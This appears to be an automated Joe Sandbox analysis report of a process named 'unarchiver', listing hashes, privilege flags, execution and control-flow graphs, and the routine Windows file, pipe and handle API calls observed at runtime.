      MD5 hash:C09985AE74F0882F208D75DE27770DFA
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Reset < >

        Execution Graph

        Execution Coverage:22.5%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:70
        Total number of Limit Nodes:4
        execution_graph 1199 a2a9e2 1200 a2aa12 CreatePipe 1199->1200 1202 a2aaaa 1200->1202 1171 a2a120 1172 a2a172 FindNextFileW 1171->1172 1174 a2a1ca 1172->1174 1175 a2b020 1176 a2b042 GetSystemInfo 1175->1176 1178 a2b07c 1176->1178 1132 a2a52a 1134 a2a562 CreateFileW 1132->1134 1135 a2a5b1 1134->1135 1136 a2a46a 1139 a2a490 CreateDirectoryW 1136->1139 1138 a2a4b7 1139->1138 1140 a2a7ae 1143 a2a7e3 SetFilePointer 1140->1143 1142 a2a812 1143->1142 1152 a2a172 1153 a2a1c2 FindNextFileW 1152->1153 1154 a2a1ca 1153->1154 1203 a2ab70 1204 a2ab96 DuplicateHandle 1203->1204 1206 a2ac1b 1204->1206 1207 a2adf7 1210 a2ae1e FindClose 1207->1210 1209 a2ae5f 1210->1209 1183 a2a6bb 1184 a2a6ee GetFileType 1183->1184 1186 a2a750 1184->1186 1187 a2a23c 1188 a2a25e SetErrorMode 1187->1188 1190 a2a29f 1188->1190 1211 a2a77c 1212 a2a7ae SetFilePointer 1211->1212 1214 a2a812 1212->1214 1124 a2b042 1125 a2b0a4 1124->1125 1126 a2b06e GetSystemInfo 1124->1126 1125->1126 1127 a2b07c 1126->1127 1128 a2a642 1129 a2a66e FindCloseChangeNotification 1128->1129 1130 a2a6ad 1128->1130 1131 a2a67c 1129->1131 1130->1129 1191 a2a600 1193 a2a60e FindCloseChangeNotification 1191->1193 1194 a2a67c 1193->1194 1195 a2a504 1197 a2a52a CreateFileW 1195->1197 1198 a2a5b1 1197->1198 1215 a2a448 1216 a2a46a CreateDirectoryW 1215->1216 1218 a2a4b7 1216->1218 1144 a2a88e 1146 a2a8c3 WriteFile 1144->1146 1147 a2a8f5 1146->1147 1155 a2aa52 1156 a2aa66 CreatePipe 1155->1156 1158 a2aaaa 1156->1158 1163 a2ae1e 1164 a2ae4a FindClose 1163->1164 1165 a2ae7c 1163->1165 1166 a2ae5f 1164->1166 1165->1164 1167 a2a25e 1168 a2a28a SetErrorMode 1167->1168 1170 a2a2b3 1167->1170 1169 a2a29f 1168->1169 1170->1168 1219 a2a85f 1221 a2a88e WriteFile 1219->1221 1222 a2a8f5 1221->1222

        Callgraph

        • Executed
        • Not Executed
        • Opacity -> Relevance
        • Disassembly available
        callgraph 0 Function_00A2A7AE 1 Function_00A2B0B2 2 Function_00DD05CF 3 Function_00A222B4 4 Function_00EE0BF9 5 Function_00EE0EF9 103 Function_00EE0B10 5->103 6 Function_00A2A6BB 7 Function_00A2AEBE 8 Function_00A223BC 9 Function_00A2B1BD 10 Function_00A2AE8A 11 Function_00DD07F7 12 Function_00DD05F6 13 Function_00A2A88E 14 Function_00A2AD8E 15 Function_00A2AF8D 16 Function_00A2AB96 17 Function_00A22194 18 Function_00A2A09A 19 Function_00A22098 20 Function_00A2B0E2 21 Function_00A2A9E2 22 Function_00A2ACE3 23 Function_00EE02A8 23->2 23->12 48 Function_00EE0C68 23->48 54 Function_00EE0C78 23->54 98 Function_00EE0B00 23->98 23->103 24 Function_00A2A6EE 25 Function_00A2A2F2 26 Function_00A221F0 27 Function_00A2ADF7 28 Function_00A2A1F4 29 Function_00A223F4 30 Function_00A2AAFA 31 Function_00A22BF8 32 Function_00A2A4FE 33 Function_00DD05BF 34 Function_00A2A2C1 35 Function_00A2AFC9 36 Function_00EE0E80 36->103 37 Function_00A2A3D2 38 Function_00DD05AF 39 Function_00A220D0 40 Function_00A2B2D7 41 Function_00EE0298 41->2 41->12 41->48 41->54 41->98 41->103 42 Function_00A2AAD8 43 Function_00DD07A6 44 Function_00DD07A2 45 Function_00DD025D 46 Function_00A2A120 47 Function_00A2B020 49 Function_00DD065A 50 Function_00A2A52A 51 Function_00A2A02E 52 Function_00A22430 53 Function_00A2A937 55 Function_00A2A23C 56 Function_00A2213C 57 Function_00EE0070 58 Function_00EE0E71 58->103 59 Function_00A2A600 60 Function_00A2A504 61 Function_00A2A005 62 Function_00A2B20A 63 Function_00A2B30A 64 Function_00DD0774 65 Function_00DD0870 66 Function_00EE0A40 67 Function_00DD066F 68 Function_00A22310 69 Function_00A2AD1E 70 Function_00A2AE1E 71 Function_00EE0A50 72 Function_00A2201C 73 Function_00DD081E 74 Function_00A22364 75 Function_00A22264 76 Function_00A2A46A 77 Function_00DD0714 78 Function_00A2AD6C 79 Function_00A2A172 80 Function_00A2A972 81 Function_00DD000C 82 Function_00A2AB70 83 Function_00A2AC71 84 Function_00A2A37B 85 Function_00A2A078 86 Function_00DD0001 87 Function_00DD0700 88 Function_00A2A77C 89 Function_00A2B042 90 Function_00A2A642 91 Function_00DD0638 91->49 92 Function_00A22044 93 Function_00EE0F08 93->103 94 Function_00EE0C08 95 Function_00EE0006 96 Function_00A2A448 97 Function_00EE0C03 98->94 98->97 99 Function_00A2AA52 100 Function_00A22458 101 Function_00A2A25E 102 Function_00A2A85F 103->94 103->97
        APIs
        • GetSystemInfo.KERNELBASE(?), ref: 00A2B074
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: InfoSystem
        • String ID:
        • API String ID: 31276548-0
        • Opcode ID: 2a90f91e3fafe0ed50662f4c117beae33dfff5ec8a1e4838f9484e6fe0c357f0
        • Instruction ID: 4524a64b4495ce93aafcbe6cc5c033ea91e07eeb0b244b8ef371958946bbabc0
        • Opcode Fuzzy Hash: 2a90f91e3fafe0ed50662f4c117beae33dfff5ec8a1e4838f9484e6fe0c357f0
        • Instruction Fuzzy Hash: E601AD718142409FDB21CF19E885766FBA4EF44320F18C4BADE498F256D3B9A408CAB2
        Uniqueness

        Uniqueness Score: -1.00%

        Memory Dump Source
        • Source File: 00000000.00000002.418274670.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_ee0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 902ed60d017e18f4b917ffb49e4d090ce853a309e21ea94e2ab4285e175702a1
        • Instruction ID: 0445f1441a620be14733dafeef5a2b0d52a72f8da4b588639eec8ed507c1832f
        • Opcode Fuzzy Hash: 902ed60d017e18f4b917ffb49e4d090ce853a309e21ea94e2ab4285e175702a1
        • Instruction Fuzzy Hash: 8622F879D01218DFDB14DFA5E884B9DBBB2FB89301F149569D809A7369CB309E82CF50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 dd0870-dd088f 1 dd083a-dd0847 0->1 2 dd0892-dd0ff0 0->2 5 dd084d-dd086d 1->5
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.418228012.0000000000DD0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_dd0000_unarchiver.jbxd
        Similarity
        • API ID:
        • String ID: ZRwP
        • API String ID: 0-3789124801
        • Opcode ID: 5e03e88a7bedbaf4ab0c34d8085124019e99f3d843ed0c11cf45961fe64ace8b
        • Instruction ID: a673153e60c63124440e465d5109d5b8c2b41855669a4631ee8f892af14328ba
        • Opcode Fuzzy Hash: 5e03e88a7bedbaf4ab0c34d8085124019e99f3d843ed0c11cf45961fe64ace8b
        • Instruction Fuzzy Hash: C7118F6104A2804FE70297545C665EA7FF8DD4323175946DBCC89CB6A3D11D281FEBB2
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 7 a2b0b2-a2b157 12 a2b159-a2b161 DuplicateHandle 7->12 13 a2b1af-a2b1b4 7->13 15 a2b167-a2b179 12->15 13->12 16 a2b1b6-a2b1bb 15->16 17 a2b17b-a2b1ac 15->17 16->17
        APIs
        • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00A2B15F
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 01bc26ba31ee9fa992c830c8e104b013c8b7032807b3a92657089272b23991bc
        • Instruction ID: 87f94fccef360505cbd1bf7f125555c36031eef9ccd53c4deefe90e9bcfa0fc9
        • Opcode Fuzzy Hash: 01bc26ba31ee9fa992c830c8e104b013c8b7032807b3a92657089272b23991bc
        • Instruction Fuzzy Hash: C631C4725043846FEB228F65DC45FA6BFBCEF45310F0889AEF985CB152D224A919CB71
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 21 a2ab70-a2ac0b 26 a2ac63-a2ac68 21->26 27 a2ac0d-a2ac15 DuplicateHandle 21->27 26->27 29 a2ac1b-a2ac2d 27->29 30 a2ac6a-a2ac6f 29->30 31 a2ac2f-a2ac60 29->31 30->31
        APIs
        • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00A2AC13
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: 8d29c9205af72d78c8096bd66dbce838b7202bd8aa74acdc26682eecb43498d7
        • Instruction ID: 9adcb205ce48f45b04a4ea3435eb6711e03fcc9f7f4d2a354f7cd4100b1eb6fd
        • Opcode Fuzzy Hash: 8d29c9205af72d78c8096bd66dbce838b7202bd8aa74acdc26682eecb43498d7
        • Instruction Fuzzy Hash: A831C4725043446FEB228B65DC44F67BFBCEF45710F0889AEF985CB152D224A819CB71
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 35 a2a9e2-a2aa0f 36 a2aa12-a2aa64 35->36 37 a2aa66-a2aad3 CreatePipe 35->37 36->37
        APIs
        • CreatePipe.KERNELBASE(?,00000E2C,?,?), ref: 00A2AAA2
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreatePipe
        • String ID:
        • API String ID: 2719314638-0
        • Opcode ID: 22ea2a157068aabd40d71f473c1f3980fdd275cc60aa0979a6fa2a22f928d40c
        • Instruction ID: 3cb7d112d2408ef6d3c9edc9f5246fbbdda4247d7775028d4a33c3af08b4328f
        • Opcode Fuzzy Hash: 22ea2a157068aabd40d71f473c1f3980fdd275cc60aa0979a6fa2a22f928d40c
        • Instruction Fuzzy Hash: F3318B6240E7C06FD7038B759C61AA1BFB4AF47610F1E84DBD8C4CF1A3D2696909CB62
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 42 a2a504-a2a582 46 a2a587-a2a593 42->46 47 a2a584 42->47 48 a2a595 46->48 49 a2a598-a2a5a1 46->49 47->46 48->49 50 a2a5f2-a2a5f7 49->50 51 a2a5a3-a2a5c7 CreateFileW 49->51 50->51 54 a2a5f9-a2a5fe 51->54 55 a2a5c9-a2a5ef 51->55 54->55
        APIs
        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00A2A5A9
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 25440887dced83cbc812e40dfe2174632a722325877221ff0ddd6590f94825fc
        • Instruction ID: 76da66ac5a71216225c6cde701204b1430f9606a135e20dabbbcd67a5b1cef3a
        • Opcode Fuzzy Hash: 25440887dced83cbc812e40dfe2174632a722325877221ff0ddd6590f94825fc
        • Instruction Fuzzy Hash: FA316FB1504380AFE722CF69DC44B66BFE8EF05710F0884AEE9858B252D375E809CB71
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 58 a2a120-a2a1f3 FindNextFileW
        APIs
        • FindNextFileW.KERNELBASE(?,00000E2C,?,?), ref: 00A2A1C2
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileFindNext
        • String ID:
        • API String ID: 2029273394-0
        • Opcode ID: 52af230312ff5f1952045923896f72b68cc3ee584b34fe5aca22b6835b8d9924
        • Instruction ID: e21bea8e84c4f615cde36b13b04ef442c095c84e9389a4dd6be1d962d1aa3152
        • Opcode Fuzzy Hash: 52af230312ff5f1952045923896f72b68cc3ee584b34fe5aca22b6835b8d9924
        • Instruction Fuzzy Hash: 5121DE7140D3C06FD7038B358C51BA2BFB4EF87620F0985DBD9848F293D225A919CBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 63 a2ab96-a2ac0b 67 a2ac63-a2ac68 63->67 68 a2ac0d-a2ac15 DuplicateHandle 63->68 67->68 70 a2ac1b-a2ac2d 68->70 71 a2ac6a-a2ac6f 70->71 72 a2ac2f-a2ac60 70->72 71->72
        APIs
        • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00A2AC13
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: b264d12696891a3c028f320f61a039a48174a1944e07487d34781dae040aff1c
        • Instruction ID: 2a5e9fb1179522475fc0ba0f5d49a196e34554e1f4f1278fc524f788a5585b11
        • Opcode Fuzzy Hash: b264d12696891a3c028f320f61a039a48174a1944e07487d34781dae040aff1c
        • Instruction Fuzzy Hash: B921C172500604AFEB21CF69DC85F6AFBACEF14710F04886AE985CB651D674E4098BB1
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 76 a2b0e2-a2b157 80 a2b159-a2b161 DuplicateHandle 76->80 81 a2b1af-a2b1b4 76->81 83 a2b167-a2b179 80->83 81->80 84 a2b1b6-a2b1bb 83->84 85 a2b17b-a2b1ac 83->85 84->85
        APIs
        • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 00A2B15F
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: DuplicateHandle
        • String ID:
        • API String ID: 3793708945-0
        • Opcode ID: cc7187921db1b73cbdda412b7bd61b29e06ecdadb16da4038e050239e5bd7aee
        • Instruction ID: ebac246bb9aeac061edcbff148201630c099f499a46538786121598d86233e3b
        • Opcode Fuzzy Hash: cc7187921db1b73cbdda412b7bd61b29e06ecdadb16da4038e050239e5bd7aee
        • Instruction Fuzzy Hash: 2E21B072500204AFEB218F69DC85F6AFBACEF04310F04896AE985CB251D774E4198B71
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 89 a2a77c-a2a802 93 a2a846-a2a84b 89->93 94 a2a804-a2a824 SetFilePointer 89->94 93->94 97 a2a826-a2a843 94->97 98 a2a84d-a2a852 94->98 98->97
        APIs
        • SetFilePointer.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A80A
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: f0dd8b52598a1d1744baff874abf071dcc91ab052a884a42396622731e8fde69
        • Instruction ID: dbaecf965ff1d2e3f6aa227c91e366f371e86ee66debbd60f965424c7b189252
        • Opcode Fuzzy Hash: f0dd8b52598a1d1744baff874abf071dcc91ab052a884a42396622731e8fde69
        • Instruction Fuzzy Hash: 2921B371409380AFEB228B25DC44F66BFB8EF56710F0884EAFD848F153D264A809C772
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 101 a2a85f-a2a8e5 105 a2a8e7-a2a907 WriteFile 101->105 106 a2a929-a2a92e 101->106 109 a2a930-a2a935 105->109 110 a2a909-a2a926 105->110 106->105 109->110
        APIs
        • WriteFile.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A8ED
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 66cf98083573ac79ce2e1d081375c493cd2626ff01e511405c7904ab3fa73347
        • Instruction ID: 8aa75072d07fe13754c4c4fc751e66eb61a3909756bae9dc596e63ed1182a3e7
        • Opcode Fuzzy Hash: 66cf98083573ac79ce2e1d081375c493cd2626ff01e511405c7904ab3fa73347
        • Instruction Fuzzy Hash: 7721B071409380AFDB228F65DC55F96BFB8EF56310F0884EAE9849F152C275A409CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 113 a2a52a-a2a582 116 a2a587-a2a593 113->116 117 a2a584 113->117 118 a2a595 116->118 119 a2a598-a2a5a1 116->119 117->116 118->119 120 a2a5f2-a2a5f7 119->120 121 a2a5a3-a2a5ab CreateFileW 119->121 120->121 123 a2a5b1-a2a5c7 121->123 124 a2a5f9-a2a5fe 123->124 125 a2a5c9-a2a5ef 123->125 124->125
        APIs
        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00A2A5A9
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 07391b7ac27197f4a616ad33d752d12ec70f09252963eedea6d4e3521f888568
        • Instruction ID: 6afacd4456d52ce8d675cc5e1ec376f78cd23ca8e2c8530c1ec7a8e697f9d2ab
        • Opcode Fuzzy Hash: 07391b7ac27197f4a616ad33d752d12ec70f09252963eedea6d4e3521f888568
        • Instruction Fuzzy Hash: 32219071600640AFEB21CF69DD85B66FBE8EF18710F18846DE9858B252D775E808CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 128 a2a6bb-a2a739 132 a2a73b-a2a74e GetFileType 128->132 133 a2a76e-a2a773 128->133 134 a2a750-a2a76d 132->134 135 a2a775-a2a77a 132->135 133->132 135->134
        APIs
        • GetFileType.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A741
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileType
        • String ID:
        • API String ID: 3081899298-0
        • Opcode ID: 0824ec7b9cbdf5b171a6b1942af08c4511a122852fe7b73d8f36fea27f92f99c
        • Instruction ID: 1e44d6ca161929f35776a0be5df1570cdf3755c186e83c3fcd7c9813d5de4b71
        • Opcode Fuzzy Hash: 0824ec7b9cbdf5b171a6b1942af08c4511a122852fe7b73d8f36fea27f92f99c
        • Instruction Fuzzy Hash: 0C21D8B54093806FE7128B25DC51BA6BFBCEF56710F0880DBE984CB153D268A909C772
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 139 a2a600-a2a60c 140 a2a626-a2a66c 139->140 141 a2a60e-a2a625 139->141 143 a2a66e-a2a676 FindCloseChangeNotification 140->143 144 a2a6ad-a2a6b2 140->144 141->140 146 a2a67c-a2a68e 143->146 144->143 147 a2a690-a2a6ac 146->147 148 a2a6b4-a2a6b9 146->148 148->147
        APIs
        • FindCloseChangeNotification.KERNELBASE(?), ref: 00A2A674
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: ChangeCloseFindNotification
        • String ID:
        • API String ID: 2591292051-0
        • Opcode ID: 951e95debb3f93d55df6be942faa3e9bb9b280f4e3a7b067e253f8857cdd0c31
        • Instruction ID: 7c165602c9a3834596aa9034b494ced5a9559accce4737d0f22eebd997d414f5
        • Opcode Fuzzy Hash: 951e95debb3f93d55df6be942faa3e9bb9b280f4e3a7b067e253f8857cdd0c31
        • Instruction Fuzzy Hash: D5219D755097C09FD7138B299C95692BFB4EF57220F0984EBD8858F2A3D2689908C762
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 150 a2a448-a2a48e 152 a2a493-a2a499 150->152 153 a2a490 150->153 154 a2a49b 152->154 155 a2a49e-a2a4a7 152->155 153->152 154->155 156 a2a4e8-a2a4ed 155->156 157 a2a4a9-a2a4c9 CreateDirectoryW 155->157 156->157 160 a2a4cb-a2a4e7 157->160 161 a2a4ef-a2a4f4 157->161 161->160
        APIs
        • CreateDirectoryW.KERNELBASE(?,?), ref: 00A2A4AF
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: 9c116dcae35a4c79da35a7ff2027d124a7b2f747f62ef6494e1065ff5e59f691
        • Instruction ID: c885cdcf5d22ff51be95d0848b459c4f1ba044e452d90ca0c150bb7604311531
        • Opcode Fuzzy Hash: 9c116dcae35a4c79da35a7ff2027d124a7b2f747f62ef6494e1065ff5e59f691
        • Instruction Fuzzy Hash: CD11A2715053809FDB11CF29DD89B56BFE8EF16220F08C4AAED45CB252D278E808CB62
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 163 a2a88e-a2a8e5 166 a2a8e7-a2a8ef WriteFile 163->166 167 a2a929-a2a92e 163->167 168 a2a8f5-a2a907 166->168 167->166 170 a2a930-a2a935 168->170 171 a2a909-a2a926 168->171 170->171
        APIs
        • WriteFile.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A8ED
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileWrite
        • String ID:
        • API String ID: 3934441357-0
        • Opcode ID: 54ea8cb7311123ecf5a69047a44afc0739f17268ab2e18ee8927662431f73840
        • Instruction ID: 09827dd5165fcc8114152b1a1c9c01cad249d3e8ae9f6716eda56fa1b5d04287
        • Opcode Fuzzy Hash: 54ea8cb7311123ecf5a69047a44afc0739f17268ab2e18ee8927662431f73840
        • Instruction Fuzzy Hash: 0B11E772500200AFEB21CF59EC85F56FBB8EF54310F1484BAEE458B251C274A449CB72
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • SetFilePointer.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A80A
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FilePointer
        • String ID:
        • API String ID: 973152223-0
        • Opcode ID: de14cbe19bf5abd2a256693389653c72039406eb30de26a4c22b806dc3a8a424
        • Instruction ID: c2e666b8eca6246fc2037f20acffa4c157cfe69708c07c255195b42f99ce5d79
        • Opcode Fuzzy Hash: de14cbe19bf5abd2a256693389653c72039406eb30de26a4c22b806dc3a8a424
        • Instruction Fuzzy Hash: 2411CA71500340AFEB21CF59DC85F66FBA8EF54710F14C47AED459B241D274A409CB72
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetSystemInfo.KERNELBASE(?), ref: 00A2B074
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: InfoSystem
        • String ID:
        • API String ID: 31276548-0
        • Opcode ID: e725c13b2e7155f9d2cbd6fea992cf9e809dc2bdbc1f7bd9d5c0d17f88fc85c0
        • Instruction ID: 0058f1ab25292e48d650e81e95ec536ef103a8e62e51ff3f2b1242f48e7c1912
        • Opcode Fuzzy Hash: e725c13b2e7155f9d2cbd6fea992cf9e809dc2bdbc1f7bd9d5c0d17f88fc85c0
        • Instruction Fuzzy Hash: 2C115E714093809FDB128F15EC85B56BFA4EF56220F0884EAED858F252D279A908CB62
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • CreateDirectoryW.KERNELBASE(?,?), ref: 00A2A4AF
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: ecf83fa66374772ecc025f93fc83b70e4f26c528f30d8ed1e356e1aae7898c8c
        • Instruction ID: 60d228634e46c37268bcea375a7bfca5c3f09e2fbe3ed8cbf09c7d44d4441013
        • Opcode Fuzzy Hash: ecf83fa66374772ecc025f93fc83b70e4f26c528f30d8ed1e356e1aae7898c8c
        • Instruction Fuzzy Hash: CE1188716002418FDB60DF59E989756FBD8EF14320F18C4BADD49CB646D6B4E804CB62
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        • GetFileType.KERNELBASE(?,00000E2C,5077525A,00000000,00000000,00000000,00000000), ref: 00A2A741
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: FileType
        • String ID:
        • API String ID: 3081899298-0
        • Opcode ID: 71b5bb2aa05421688472f99f0747eb0722a8746be95cc875e80b53f7d302a052
        • Instruction ID: 040bddee2bd459c41074f5ab7f2476c75b63089048e7fdc18be144d691c40d8c
        • Opcode Fuzzy Hash: 71b5bb2aa05421688472f99f0747eb0722a8746be95cc875e80b53f7d302a052
        • Instruction Fuzzy Hash: 5101F571500340AFEB20CB19DC85F6AFBBCEF54720F14C0AAEE459B241D278E409CAB6
        Uniqueness

        Uniqueness Score: -1.00%

        APIs
        Memory Dump Source
        • Source File: 00000000.00000002.418070402.0000000000A2A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_a2a000_unarchiver.jbxd
        Similarity
        • API ID: CloseFind
        • String ID:
        • API String ID: 1863332320-0
        • Opcode ID: 00240eefbd062e8266d8c7aeb95ffb16ac2e07ea865777cd600c2442489c441a
        • Instruction ID: 8aa919cdf765b9234985cd415b1137b2810caf2c0750c7d7e427c1d5795f1fe7
        • Opcode Fuzzy Hash: 00240eefbd062e8266d8c7aeb95ffb16ac2e07ea865777cd600c2442489c441a
